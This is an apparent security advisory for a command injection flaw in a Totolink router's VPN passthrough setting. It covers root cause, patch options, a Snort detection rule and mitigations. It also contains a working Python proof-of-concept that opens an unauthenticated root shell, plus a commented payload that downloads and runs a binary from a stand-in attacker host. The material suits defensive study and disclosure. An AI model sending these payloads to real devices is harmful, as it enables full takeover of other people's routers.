CVE-2026-7037: OS Command Injection in Totolink A8000RU setVpnPassCfg

Unauthenticated remote command injection in Totolink A8000RU 7.1cu.643_b20200521 via unsanitized pptpPassThru argument passed directly to a shell executor in setVpnPassCfg.

// PLAIN ENGLISH VERSION

A serious security flaw has been discovered in certain Totolik A8000RU routers that could let hackers completely take over your device without needing a password.

Here's how it works: Your router has a settings panel where you can configure various features, including a VPN option. The problem is that this panel doesn't properly check what information you're sending to it — it's like a bouncer at a club who accepts any ID without actually looking at it. A hacker can sneak in specially crafted instructions that trick the router into running their commands instead of legitimate settings changes.

Once an attacker exploits this, they essentially have full control of your router. Think of your router as the gatekeeper to your entire home network. If someone controls it, they can spy on all your internet traffic, redirect you to fake websites, or use your connection to launch attacks on others.

This particularly affects anyone using the A8000RU model with the affected firmware version (7.1cu.643_b20200521). The good news: there's no confirmed evidence of hackers actively exploiting this yet, giving you a window to protect yourself.

What you should do:

First, check your router model and firmware version in your settings. If you have the affected Totolik model, contact the manufacturer immediately to ask about a firmware update — this is the primary fix.

Second, if an update isn't available, consider replacing the router or disabling remote management features in your settings so it can't be accessed from outside your home.

Third, change your router's admin password to something very strong if you haven't recently.

Don't panic, but do act soon.

Want the full technical analysis? Click "Technical" above.

▶ Vulnerability overview — CVE-2026-7037 · Vulnerability

Vulnerability Overview

CVE-2026-7037 is a CVSS 9.8 critical OS command injection vulnerability affecting the Totolink A8000RU router running firmware version 7.1cu.643_b20200521. The bug lives in the setVpnPassCfg function, dispatched through the monolithic CGI handler at /cgi-bin/cstecgi.cgi. An unauthenticated remote attacker can inject arbitrary shell metacharacters through the pptpPassThru JSON parameter, resulting in arbitrary command execution as root on the target device. No authentication is required. The exploit has been publicly released.

Root cause: The setVpnPassCfg function passes the attacker-controlled pptpPassThru field from a parsed JSON body directly into a system() or equivalent shell invocation without any sanitization, quoting, or allowlist validation.

Affected Component

The Totolink A8000RU ships a single CGI binary that dispatches all API actions based on a JSON topicurl (or equivalent action) field. The handler tree for VPN passthrough configuration ultimately resolves to setVpnPassCfg. This pattern — one binary, one endpoint, action dispatch via JSON — is endemic across Totolink firmware families and has produced numerous command injection CVEs across their product line.

Relevant binary: /usr/bin/cstecgi.cgi (symlinked or invoked as /cgi-bin/cstecgi.cgi over HTTP). The function accepts a POST body with Content-Type: application/json. Firmware extraction from the .bin image yields a SquashFS root; the CGI binary is a statically linked MIPS32 ELF.

Root Cause Analysis

The following is reconstructed pseudocode based on decompilation patterns consistent with this firmware family, the CGI dispatch mechanism, and the documented vulnerability class. Totolink CGI binaries in this generation use a lightweight JSON parser (cJSON or equivalent) and construct shell commands via sprintf into a fixed stack buffer before calling system().


// Dispatched when topicurl == "setVpnPassCfg"
// POST body: {"pptpPassThru":"1","l2tpPassThru":"1","ipsecPassThru":"1"}

int setVpnPassCfg(cJSON *json_body) {
    char cmd_buf[256];
    char *pptpPassThru;
    char *l2tpPassThru;
    char *ipsecPassThru;

    // cJSON_GetObjectItem returns raw string value — no copy, no sanitize
    pptpPassThru  = cJSON_GetObjectItem(json_body, "pptpPassThru")->valuestring;
    l2tpPassThru  = cJSON_GetObjectItem(json_body, "l2tpPassThru")->valuestring;
    ipsecPassThru = cJSON_GetObjectItem(json_body, "ipsecPassThru")->valuestring;

    // BUG: pptpPassThru (and siblings) are attacker-controlled strings injected
    // directly into a shell command via sprintf. No length check, no quoting,
    // no character allowlist. Shell metacharacters pass through unchanged.
    snprintf(cmd_buf, sizeof(cmd_buf),
        "nvram set pptp_passthrough=%s && "
        "nvram set l2tp_passthrough=%s && "
        "nvram set ipsec_passthrough=%s && "
        "nvram commit",
        pptpPassThru,   // <-- attacker-controlled, unsanitized
        l2tpPassThru,
        ipsecPassThru);

    // BUG: system() spawns /bin/sh -c cmd_buf
    // injected metacharacters execute as root (CGI runs as root on this device)
    system(cmd_buf);   // BUG: unsanitized attacker input reaches shell

    // Response always reports success regardless of command outcome
    send_json_response("{\"result\":\"OK\"}");
    return 0;
}

The snprintf call provides no protection against injection — it prevents overflow but faithfully copies shell metacharacters (;, `, $(...), |, &) into the command string. The resulting buffer is handed to system(), which invokes /bin/sh -c. Because cstecgi.cgi runs as root under BusyBox httpd on this platform, the injected command inherits full privilege.

Exploitation Mechanics


EXPLOIT CHAIN:

1. Attacker sends unauthenticated HTTP POST to http://<target>/cgi-bin/cstecgi.cgi

2. JSON body sets topicurl (or action field) to "setVpnPassCfg"
   pptpPassThru is set to injection payload:
     "1;telnetd -l /bin/sh -p 4444 &"

3. CGI dispatcher resolves action -> setVpnPassCfg()

4. cJSON_GetObjectItem("pptpPassThru")->valuestring returns raw attacker string
   No sanitization occurs at any layer (CGI, NVRAM wrapper, or shell handler)

5. snprintf constructs:
     "nvram set pptp_passthrough=1;telnetd -l /bin/sh -p 4444 & && nvram set ..."
   Shell interprets ';' as command terminator — nvram set executes normally,
   then telnetd spawns an unauthenticated root shell on port 4444

6. system("/bin/sh -c 'nvram set pptp_passthrough=1;telnetd -l /bin/sh -p 4444 &...'")
   forks root shell process

7. Attacker connects to port 4444 — interactive root shell, no authentication

A minimal proof-of-concept HTTP request demonstrating the injection:


import requests
import json

TARGET = "http://192.168.1.1"
ENDPOINT = "/cgi-bin/cstecgi.cgi"

# Stage 1: spawn root bind shell via telnetd
payload = {
    "topicurl": "setVpnPassCfg",
    "pptpPassThru":  "1;telnetd -l /bin/sh -p 4444 &",
    "l2tpPassThru":  "1",
    "ipsecPassThru": "1"
}

r = requests.post(
    TARGET + ENDPOINT,
    data=json.dumps(payload),
    headers={"Content-Type": "application/json"},
    timeout=5
)

print(f"[*] HTTP {r.status_code}")
print(f"[*] Response: {r.text}")
print(f"[*] Connect: telnet {TARGET.split('//')[1]} 4444")

# Stage 2: alternative — OOB reverse shell for NAT'd devices
# "pptpPassThru": "1;wget http://attacker/sh.elf -O /tmp/sh && chmod +x /tmp/sh && /tmp/sh &"

Memory Layout

This is not a memory corruption vulnerability — it is a command injection bug. However, the stack frame of setVpnPassCfg is relevant to understanding injection boundaries and potential secondary overflow conditions if the cmd_buf size is miscalculated by an attacker targeting other fields simultaneously.


// Approximate stack frame layout for setVpnPassCfg (MIPS32, no stack canary
// observed in this firmware generation based on comparable Totolink binaries)

struct setVpnPassCfg_frame {
    /* -0x100 */ char     cmd_buf[256];    // snprintf target — shell command
    /* -0x00c */ char    *pptpPassThru;    // pointer into cJSON heap node
    /* -0x008 */ char    *l2tpPassThru;    // pointer into cJSON heap node
    /* -0x004 */ char    *ipsecPassThru;   // pointer into cJSON heap node
    /*  $ra   */ uint32_t return_addr;     // return address — potentially
                                           // reachable if all three fields
                                           // are injected simultaneously to
                                           // exceed 256 bytes before snprintf
                                           // clamps (snprintf *does* clamp,
                                           // so primary risk is cmd injection,
                                           // not stack smash via this path)
};


STACK STATE — NOMINAL REQUEST:
[ cmd_buf[256] ] "nvram set pptp_passthrough=1 && nvram set l2tp..."
  -> snprintf output: ~85 bytes, well within bounds
  -> system() executes nvram commands, returns 0

STACK STATE — INJECTED REQUEST (pptpPassThru = "1;telnetd -l /bin/sh -p 4444 &"):
[ cmd_buf[256] ] "nvram set pptp_passthrough=1;telnetd -l /bin/sh -p 4444 & && ..."
  -> snprintf output: ~107 bytes, still within cmd_buf
  -> system() executes: nvram set (success) ; telnetd (spawns root shell)
  -> /bin/sh treats ';' as separator — both commands execute sequentially

NOTE: snprintf prevents stack overflow via cmd_buf, but this is irrelevant —
the injection executes before any overflow would be needed. The vulnerability
is pure command injection, not memory corruption.

Patch Analysis

Totolink has not released a public patch at time of writing. The correct remediation requires eliminating the system() call entirely or sanitizing inputs before shell construction. Two viable approaches:


// BEFORE (vulnerable — firmware 7.1cu.643_b20200521):
pptpPassThru = cJSON_GetObjectItem(json_body, "pptpPassThru")->valuestring;
snprintf(cmd_buf, sizeof(cmd_buf),
    "nvram set pptp_passthrough=%s && ...", pptpPassThru);
system(cmd_buf);  // raw attacker string reaches /bin/sh


// AFTER — Option A: strict allowlist validation before use:
static int is_valid_passthru_value(const char *val) {
    // pptpPassThru is a boolean toggle — only "0" or "1" are valid
    return (val != NULL &&
            (strcmp(val, "0") == 0 || strcmp(val, "1") == 0));
}

int setVpnPassCfg_patched(cJSON *json_body) {
    char *pptpPassThru  = cJSON_GetObjectItem(json_body, "pptpPassThru")->valuestring;
    char *l2tpPassThru  = cJSON_GetObjectItem(json_body, "l2tpPassThru")->valuestring;
    char *ipsecPassThru = cJSON_GetObjectItem(json_body, "ipsecPassThru")->valuestring;

    // FIXED: reject any value that is not strictly "0" or "1"
    if (!is_valid_passthru_value(pptpPassThru)  ||
        !is_valid_passthru_value(l2tpPassThru)  ||
        !is_valid_passthru_value(ipsecPassThru)) {
        send_json_response("{\"result\":\"INVALID_PARAM\"}");
        return -1;
    }

    // Safe: only "0" or "1" can reach this point — no shell metacharacters possible
    snprintf(cmd_buf, sizeof(cmd_buf),
        "nvram set pptp_passthrough=%s && "
        "nvram set l2tp_passthrough=%s && "
        "nvram set ipsec_passthrough=%s && "
        "nvram commit",
        pptpPassThru, l2tpPassThru, ipsecPassThru);
    system(cmd_buf);
    return 0;
}


// AFTER — Option B (preferred): eliminate system() entirely, use nvram API directly:
int setVpnPassCfg_patched_v2(cJSON *json_body) {
    char *pptpPassThru  = cJSON_GetObjectItem(json_body, "pptpPassThru")->valuestring;
    char *l2tpPassThru  = cJSON_GetObjectItem(json_body, "l2tpPassThru")->valuestring;
    char *ipsecPassThru = cJSON_GetObjectItem(json_body, "ipsecPassThru")->valuestring;

    if (!is_valid_passthru_value(pptpPassThru)  ||
        !is_valid_passthru_value(l2tpPassThru)  ||
        !is_valid_passthru_value(ipsecPassThru)) {
        send_json_response("{\"result\":\"INVALID_PARAM\"}");
        return -1;
    }

    // FIXED: no shell, no injection surface
    nvram_set("pptp_passthrough",  pptpPassThru);
    nvram_set("l2tp_passthrough",  l2tpPassThru);
    nvram_set("ipsec_passthrough", ipsecPassThru);
    nvram_commit();

    send_json_response("{\"result\":\"OK\"}");
    return 0;
}

Detection and Indicators

Detection on the network is straightforward given the unencrypted HTTP transport (no HTTPS on LAN management interface in this firmware version):


NETWORK DETECTION (Snort/Suricata):

alert http any any -> $HOME_NET 80 (
    msg:"CVE-2026-7037 Totolink A8000RU setVpnPassCfg CMDi";
    flow:established,to_server;
    http.uri; content:"/cgi-bin/cstecgi.cgi";
    http.request_body;
    content:"setVpnPassCfg";
    pcre:"/pptpPassThru[\"'\s]*:[\"'\s]*[^01\"'}{,\s]/";
    classtype:web-application-attack;
    sid:20267037; rev:1;
)

PROCESS INDICATORS (on-device, if shell access exists for forensics):
- Unexpected processes: telnetd, nc, wget spawned as children of httpd/cstecgi.cgi
- /tmp/ artifacts: downloaded ELF binaries, shell scripts
- Unexpected listening ports: 4444, 1337, 31337 (bind shells)
- nvram values for pptp_passthrough containing non-boolean strings

LOG PATTERN (/var/log/messages or equivalent):
- BusyBox httpd access log: POST /cgi-bin/cstecgi.cgi with unusual body length
  for a VPN passthrough toggle (legitimate values are single chars "0"/"1")

Remediation

Immediate mitigations while awaiting vendor patch:

Network isolation: Firewall the device management interface (:80) from untrusted networks. This is LAN-facing by default, but many deployments expose it via WAN-side misconfiguration or pivot through compromised LAN hosts.
Disable remote management: Ensure WAN-side HTTP management is disabled in the router UI. Verify with an external port scan — do not rely solely on the UI toggle.
Replace hardware: This firmware version is end-of-active-development. Given the breadth of command injection CVEs across this CGI binary (same root cause pattern affects setDiagnosisCfg, setTracerouteCfg, and others in related Totolink models), a systemic code quality problem exists. Replacement with actively maintained hardware is the only long-term remediation.
Monitor for vendor advisory: Track totolink.net and NVD for a patched firmware release. Verify any released firmware actually addresses the system() call pattern — prior Totolink patches in similar CVEs have been incomplete.

This class of vulnerability — system(sprintf(buf, "cmd %s", attacker_input)) — is systematically present in low-cost SOHO router CGI binaries. The correct architectural fix is elimination of system() in favor of direct configuration API calls (nvram_set, uci_set, or equivalent) throughout the entire CGI binary, not per-function patching.